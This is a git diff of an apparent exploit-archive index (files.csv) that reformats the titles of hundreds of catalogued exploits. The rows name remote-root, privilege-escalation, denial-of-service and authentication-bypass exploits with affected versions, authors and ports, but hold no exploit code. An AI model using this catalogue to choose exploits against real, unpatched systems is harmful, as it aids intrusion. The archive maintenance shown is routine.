diff --git a/files.csv b/files.csv index 0864c07f9..fac0ee4c5 100755 --- a/files.csv +++ b/files.csv @@ -9,7 +9,7 @@ id,file,description,date,author,platform,type,port 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 -37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0 +37060,platforms/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash PoC (1)",2015-05-19,Garage4Hackers,windows,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 @@ -99,7 +99,7 @@ id,file,description,date,author,platform,type,port 99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 -102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit",2003-09-20,N/A,linux,remote,617 +102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,N/A,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308 @@ -152,7 +152,7 @@ id,file,description,date,author,platform,type,port 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 -158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 +158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 @@ -160,10 +160,10 @@ id,file,description,date,author,platform,type,port 164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 -167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 +167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 -170,platforms/multiple/dos/170.c,"Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 +170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 171,platforms/linux/remote/171.c,"tcpdump ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow Exploit",2004-04-07,I2S-LaB,windows,local,0 173,platforms/linux/remote/173.pl,"Monit <= 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 @@ -188,7 +188,7 @@ id,file,description,date,author,platform,type,port 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 193,platforms/linux/local/193.sh,"dump 0.4b15 - Local Root Exploit",2000-11-19,mat,linux,local,0 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 -197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 +197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 pppd Stack Buffer Overflow Exploit",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi suidperl Local Stack Buffer Overflow Exploit",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"wu-ftpd 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 @@ -196,16 +196,16 @@ id,file,description,date,author,platform,type,port 203,platforms/linux/local/203.sh,"vixie-cron - Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 205,platforms/linux/local/205.pl,"Redhat 6.2 /usr/bin/rcp suid - Privledge Exploit",2000-11-29,Tlabs,linux,local,0 -206,platforms/linux/local/206.c,"dump 0.4b15 Exploit (Redhat 6.2)",2000-11-29,mat,linux,local,0 +206,platforms/linux/local/206.c,"dump 0.4b15 (Redhat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Local Root Buffer Overflow Exploit",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Local Root Exploit",2000-11-30,localcore,linux,local,0 -210,platforms/solaris/local/210.c,"Solaris locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 +210,platforms/solaris/local/210.c,"Solaris - locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 211,platforms/cgi/webapps/211.c,"PHF - Buffer Overflow Exploit for Linux-x86",2000-12-01,proton,cgi,webapps,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0 213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service Exploit",2000-12-02,phonix,windows,dos,0 -215,platforms/linux/local/215.c,"mount Exploit for glibc locale bug",2000-12-02,sk8,linux,local,0 +215,platforms/linux/local/215.c,"glibc locale bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) Buffer Overflow",2000-12-04,isox,linux,local,0 @@ -215,7 +215,7 @@ id,file,description,date,author,platform,type,port 222,platforms/linux/local/222.c,"gnome_segv Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 -227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 +227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 (one russi4n proxy-server) Heap Buffer Overflow Exploit",2000-12-15,diman,bsd,remote,3128 229,platforms/linux/local/229.c,"Linux xsoldier-0.96 Exploit (Red Hat 6.2)",2000-12-15,zorgon,linux,local,0 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 @@ -235,7 +235,7 @@ id,file,description,date,author,platform,type,port 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 -249,platforms/linux/local/249.c,"GLIBC locale format strings Exploit",2003-01-15,logikal,linux,local,0 +249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 @@ -258,7 +258,7 @@ id,file,description,date,author,platform,type,port 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 -273,platforms/linux/local/273.c,"SquirrelMail chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 +273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - 'setsockopt' Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 @@ -282,8 +282,8 @@ id,file,description,date,author,platform,type,port 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e Remote Denial of Service Exploit",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 -300,platforms/multiple/remote/300.c,"CVS Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 -301,platforms/solaris/remote/301.c,"CVS Remote Entry Line Root Heap Overflow Exploit",2004-06-25,N/A,solaris,remote,2401 +300,platforms/multiple/remote/300.c,"CVS - Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 +301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow Exploit",2004-06-25,N/A,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,N/A,unix,local,0 303,platforms/linux/remote/303.pl,"Borland Interbase <= 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 @@ -334,7 +334,7 @@ id,file,description,date,author,platform,type,port 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service Vulnerability",2004-07-22,"Peter Kruse",hardware,dos,0 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535 -360,platforms/multiple/dos/360.pl,"Apache HTTPd Arbitrary Long HTTP Headers DoS",2004-07-22,bkbll,multiple,dos,80 +360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS",2004-07-22,bkbll,multiple,dos,80 361,platforms/windows/remote/361.txt,"Flash FTP Server Directory Traversal",2004-07-22,CoolICE,windows,remote,0 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0 @@ -362,8 +362,8 @@ id,file,description,date,author,platform,type,port 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow Exploit",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH <= 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 388,platforms/windows/local/388.c,"Ollydbg <= 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 -389,platforms/linux/remote/389.c,"LibPNG Graphics Library Remote Buffer Overflow Exploit",2004-08-11,infamous41md,linux,remote,0 -390,platforms/linux/remote/390.c,"GV PostScript Viewer Remote Buffer Overflow Exploit",2004-08-13,infamous41md,linux,remote,0 +389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow Exploit",2004-08-11,infamous41md,linux,remote,0 +390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow Exploit",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 - AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0 @@ -406,7 +406,7 @@ id,file,description,date,author,platform,type,port 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 -438,platforms/linux/local/438.c,"cdrecord $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 +438,platforms/linux/local/438.c,"CDRecord - $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow Exploit",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service Exploit",2004-09-13,str0ke,windows,dos,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek Null Byte Error Discloses Files to Remote Users",2004-09-13,durito,cgi,webapps,0 @@ -525,7 +525,7 @@ id,file,description,date,author,platform,type,port 676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam <= 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 -680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Local Root Exploit",2004-12-08,"Jonathan Bringhurst",osx,local,0 +680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Local Root Exploit (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle <= 1.42 - Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 @@ -596,21 +596,21 @@ id,file,description,date,author,platform,type,port 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 -772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code)",2005-01-25,THUNDER,cgi,webapps,0 -773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) configdir Remote Command Execution Exploit (perl code)",2005-01-25,GHC,cgi,webapps,0 +772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (C)",2005-01-25,THUNDER,cgi,webapps,0 +773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 -781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80 +781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (1)",2005-02-01,"Tal Zeltzer",windows,remote,80 782,platforms/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service Exploit",2005-02-01,karak0rsan,windows,dos,80 783,platforms/windows/dos/783.c,"Painkiller <= 1.35 - in-game cd-key alpha-numeric Buffer Overflow Exploit",2005-02-02,"Luigi Auriemma",windows,dos,0 784,platforms/linux/remote/784.c,"ngIRCd <= 0.8.2 - Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - socket_getline() Remote Buffer Overflow Exploit (2)",2005-02-03,cybertronic,linux,remote,119 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 -787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 - Remote Buffer OverflowExploit (win2003)",2005-02-04,CorryL,windows,remote,80 +787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 - Remote Buffer OverflowExploit (Windows 2003)",2005-02-04,CorryL,windows,remote,80 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Local Root Exploit",2005-02-05,"Charles Stevenson",linux,local,0 789,platforms/linux/dos/789.c,"ngIRCd <= 0.8.1 - Remote Denial of Service Exploit (2)",2005-02-05,CorryL,linux,dos,6667 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x SQL-Injection Exploit",2005-02-05,deluxe89,cgi,webapps,0 @@ -618,7 +618,7 @@ id,file,description,date,author,platform,type,port 792,platforms/linux/local/792.c,"Setuid perl PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Mac OS X DS_Store Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 -795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit",2005-02-07,0xdeadbabe,osx,local,0 +795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim <= 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 @@ -642,7 +642,7 @@ id,file,description,date,author,platform,type,port 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 817,platforms/cgi/dos/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 -819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80 +819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 @@ -667,7 +667,7 @@ id,file,description,date,author,platform,type,port 842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 - File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0 843,platforms/windows/dos/843.c,"Knet <= 1.04c - Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 -845,platforms/windows/remote/845.c,"BadBlue 2.5 Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 +845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 846,platforms/windows/local/846.cpp,"Einstein <= 1.01 - Local Password Disclosure Exploit",2005-02-27,Kozan,windows,local,0 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 848,platforms/windows/local/848.asm,"Einstein <= 1.01 - Local Password Disclosure Exploit (asm)",2005-02-28,illwill,windows,local,0 @@ -691,7 +691,7 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) <= 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 -871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 +871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vulnerability",2005-03-11,Ali7,php,webapps,0 874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows)",2005-03-12,"Leon Juranic",windows,dos,0 @@ -709,14 +709,14 @@ id,file,description,date,author,platform,type,port 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service Exploit",2005-03-17,"Tal Zeltzer",windows,dos,0 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 -889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 +889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 -897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0 +897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25 @@ -748,7 +748,7 @@ id,file,description,date,author,platform,type,port 926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Local Root (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 